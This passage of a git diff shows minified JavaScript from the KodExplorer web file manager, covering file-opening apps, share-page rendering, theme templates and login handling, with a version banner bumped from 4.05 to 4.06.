g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:10,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("webloc"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()}),Hook.bind("rightMenu.initFinished",function(){if(1!=G.isRoot){var e="hidden";if(core.authCheck("explorer.fileDownload")||(kodApp.remove("browserOpen"),$(".context-menu-list .down,.context-menu-list .download").addClass(e),$(".context-menu-list .share").addClass(e),$(".context-menu-list .open-text").addClass(e),$(".pathinfo .open-window").addClass(e),$(".context-menu-list .open-browser").addClass(e)),core.authCheck("explorer.search")||$(".context-menu-list .search").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder").addClass(e),core.authCheck("userShare.set")||$(".context-menu-list .share").remove(),core.authCheck("explorer.mkfile")||$(".context-menu-list .newfile,.tool-path-newfile").addClass(e),core.authCheck("explorer.mkdir")||$(".context-menu-list .newfolder,[data-action=newfolder]").addClass(e),core.authCheck("explorer.pathCopy")||($(".context-menu-list .cute").addClass(e),$(".context-menu-list .copy").addClass(e)),!core.authCheck("explorer.fileUpload")){$(".context-menu-list .upload").addClass(e);var t=$("[data-action=upload-more]");t.exists()&&t.parent().addClass(e)}}})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/topbar",[],function(){var e=function(){var e=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid,t=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid;"file"!=G.shareInfo.type&&G.path!==void 0?(t+="&path="+G.path,e+="&path="+G.path,$(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()):($(".btn.button-my-share").show(),$(".share-info-user .btn-group").hide()),"file"==G.shareInfo.type&&($(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()),"1"==G.shareInfo.notDownload&&(e="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),$(".share-info-user").removeClass("hidden"),$(".btn-download").attr("href",e);var a=date("Y/m/d H:i:s",G.shareInfo.mtime);$(".topbar .time").html(a),"file"==G.shareInfo.type&&$(".topbar .size").html(G.shareInfo.size),$(".topbar .info").html(LNG.share_view_num+G.shareInfo.numView+" "+LNG.share_download_num+G.shareInfo.numDownload),$("#button_share").die("click").live("click",function(){share()})};return{init:e}}),define("app/src/shareIndex/fileShow",[],function(e){var t="share/fileDownload&user="+G.user+"&sid="+G.sid,a="share/fileProxy&user="+G.user+"&sid="+G.sid,i=G.KOD_USER_SHARE+":"+G.user+"/";G.shareInfo&&G.shareInfo.name&&(i+=G.shareInfo.name+G.path);var n=function(){t=G.appHost+t,a=G.appHost+a,o(),G.shareInfo!==void 0?(G.path=htmlDecode(G.path),G.shareInfo.path=htmlDecode(G.shareInfo.path),"file"!=G.shareInfo.type&&(a+="&path="+urlEncode(G.path),t+="&path="+G.path),"1"==G.shareInfo.notDownload&&(t="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),topbar.init(),kodApp.open(i),s()):$(".share-info").addClass("hidden")},o=function(){kodApp.clearOpenUser(),kodApp.openUnknow=r,kodApp.remove("onlyoffice"),kodApp.setOpenUserLocal(!1,"autoDeskViewer"),kodApp.setOpenUserLocal(!1,"yzOffice"),kodApp.setOpenUserLocal(!1,"epubReader"),kodApp.add({ext:"jpg,jpeg,png,bmp,gif,ico,svg,cur,webp",sort:1e3,callback:function(){var e='';$(".content-box").addClass("show-image").append(e)}}),kodApp.add({ext:"md",sort:1e3,callback:d}),kodApp.add({ext:kodApp.appSupportCheck("aceEditor"),sort:1e3,callback:function(){e.async("lib/ace/src-min-noconflict/ace",function(){e.async(["lib/ace/src-min-noconflict/ext-language_tools","lib/ace/src-min-noconflict/ext-modelist"],function(){c()})})}})},s=function(){if($(".artDialog").exists()){var e=$(".artDialog").data().artDialog;if(e.hasFrame()){$(".artDialog").addClass("hidden");var t=e.DOM.wrap.find("iframe").attr("src");e.close();var a='';$(".frame-main").append(a),$(".content-box").addClass("hidden")}}},r=function(){var e=core.pathExt(G.shareInfo.path),a=$(".bindary-box");a.removeClass("hidden"),a.find(".name").html(htmlEncode(G.shareInfo.name)),a.find(".ico").html(core.icon(e)),a.find(".btn-download").attr("href",t);var i=date("Y/m/d h:i",G.shareInfo.mtime);a.find(".share-time").html(i),a.find(".size span").html(G.shareInfo.size),$("body").addClass("can-select")},l=function(e){for(var t=[],a=0;e.length>a;a++)t[a]=e.charCodeAt(a).toString(16);return"&#"+String.fromCharCode(120)+t.join(";&#"+String.fromCharCode(120))+";"},c=function(){ace.require("ace/ext/language_tools");var e=ace.require("ace/ext/modelist"),t=ace.require("ace/lib/net");t.loadScript.hook("loadScript",t,function(){return"string"==typeof arguments[0]&&-1!==arguments[0].search("mode-php.js")&&(arguments[0]=arguments[0].replace("mode-php.js","mode-phhp.js")),arguments}),ace.config.moduleUrl.hook("moduleUrl",ace.config,function(){return-1!==arguments[0].search("php_worker")&&(arguments[0]=arguments[0].replace("php_worker","phhp_worker")),arguments}),core.fileGet(G.path,function(t){var a=e.getModeForPath(G.shareInfo.path).mode,i='
      '+l(t)+"
      ";$(".content-box").addClass("show-code").append(i);var n=ace.edit("ace-text-show");n.setTheme("ace/theme/tomorrow"),n.setReadOnly(!0),n.setShowPrintMargin(!1),n.getSession().setMode(a),n.getSession().setTabSize(4),n.getSession().setUseWrapMode(1),n.setFontSize(15)})},d=function(){e.async("lib/markdown/markdown-it.min",function(){var t=window.markdownit({html:!0,breaks:!0});core.fileGet(G.path,function(a){var i=t.render(a),n=$(".content-box");n.addClass("markdown-preview can-select").append(i),n.find("a").attr("target","_blank");var o="

      [TOC]

      ";if(-1!=n.html().indexOf(o)){var s=function(e){var t="";return e.find("h1,h2,h3,h4,h5,h6").each(function(){var e="markdown-"+$(this).text().replace(/\s+/g,"-"),a="markdown-menu-"+$(this)[0].tagName.toLowerCase();$(this).attr("data-link","#"+e),t+='
    • '+$(this).text()+"
    • "}),t="
        "+t+"
      "},r=s(n),i=n.html();i=i.replace(o,r),i=i.replace(/ data-link="#(.*?)">/g,'>'),n.html(i)}e.async("lib/markdown/highlight.min",function(){$(".content-box").find("pre code").each(function(e,t){$(this).removeAttr("class"),hljs.highlightBlock(t)})}),e.async(["lib/markdown/katex/katex.min.js","lib/markdown/katex/katex.min.css","lib/markdown/katex/contrib/auto-render.min.js"],function(){renderMathInElement(n[0],[{left:"$$",right:"$$",display:!0}]),$(".katex-display").parent().addClass("markdown-latex"),n.find(".language-latex,.language-math,.language-katex").each(function(){try{var e=katex.renderToString($(this).text());if("string"!=typeof e)return;e='
      '+e+"
      ",$(e).insertBefore($(this).parent()),$(this).parent().remove()}catch(t){}}),"function"==typeof callback&&callback()})})})};return{init:n}}); \ No newline at end of file diff --git a/static/js/app/src/user/main.js b/static/js/app/src/user/main.js index 335d4fc..34f5cc5 100755 --- a/static/js/app/src/user/main.js +++ b/static/js/app/src/user/main.js @@ -1,4 +1,4 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/user/main",["lib/jquery-lib","lib/util","lib/artDialog/jquery-artDialog","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html"],function(e){e("lib/jquery-lib"),e("lib/util"),e("lib/artDialog/jquery-artDialog"),core=e("../../common/core"),$(document).ready(function(){$(".init-loading").fadeOut(450).addClass("pop_fadeout"),core.init(),LocalData.del("thisPath");var e=function(){$(":focus").is("input")||0==$("#username").length||$("#username").focus()},t=function(){var t=G.appHost+"user/checkCode&t="+UUID();$(".check-code img").attr("src",t),$(".check-code").val("").focus(),e()},a=function(e){var a=$("#username").val(),i=$("#password").val(),n=$("input[name=rememberPassword]").attr("checked")?1:0,o=G.appHost+"user/loginSubmit&name="+urlEncode(a)+"&checkCode="+$("input.check-code").val()+"&password="+urlEncode(i)+"&rememberPassword="+n+"&isAjax=1";return $.ajax({dataType:"json",url:o,error:function(e,t,a){setTimeout(function(){core.ajaxError(e,t,a)},600)},success:function(e){if("ok"!=e.data&&($(".msg").show().html(e.data),Tips.tips(e.data,!1)),e.code){var a=G.appRoot;void 0!=$.getUrlParam("link")&&(a=urlDecode($.getUrlParam("link"))),window.location.href=a}else $(".loginbox").shake(2,30,60),t(),$("#username").focus()}}),stopPP(e),!1};isWap()||e(),$(".check-code img").bind("click",t),$("form").submit(a),$("#username,#password,input.check-code").keyEnter(a),$(".forget-password").bind("click",function(){$.dialog.alert(LNG.forget_password_tips)}),0!=$(".login-wap").length&&($("body").click(function(){$(".common-footer").hide()}),$("input").bind("input keypress focus",function(){$(".common-footer").hide()}).bind("blur",function(){$(".common-footer").show()}));var i=$(".admin-password input"),n=$(".admin-password-repeat input");i.keyEnter(function(){$(".start").click()}),n.keyEnter(function(){$(".start").click()}),$(".start").bind("click",function(){var e=trim(i.val());e!=n.val()?Tips.tips(LNG.login_root_password_equal,!1):""==e?(Tips.tips(LNG.login_root_password_tips,!1),i.focus()):window.location.href=G.appHost+"user/loginFirst&password="+urlEncode(e)}),$(".LICENSE_SUBMIT").bind("click",function(){var e=i.val();""==e?(Tips.tips(LNG.not_null,!1),i.focus()):window.location.href=G.appHost+"user/versionInstall&license_code="+e})})}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
      ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return 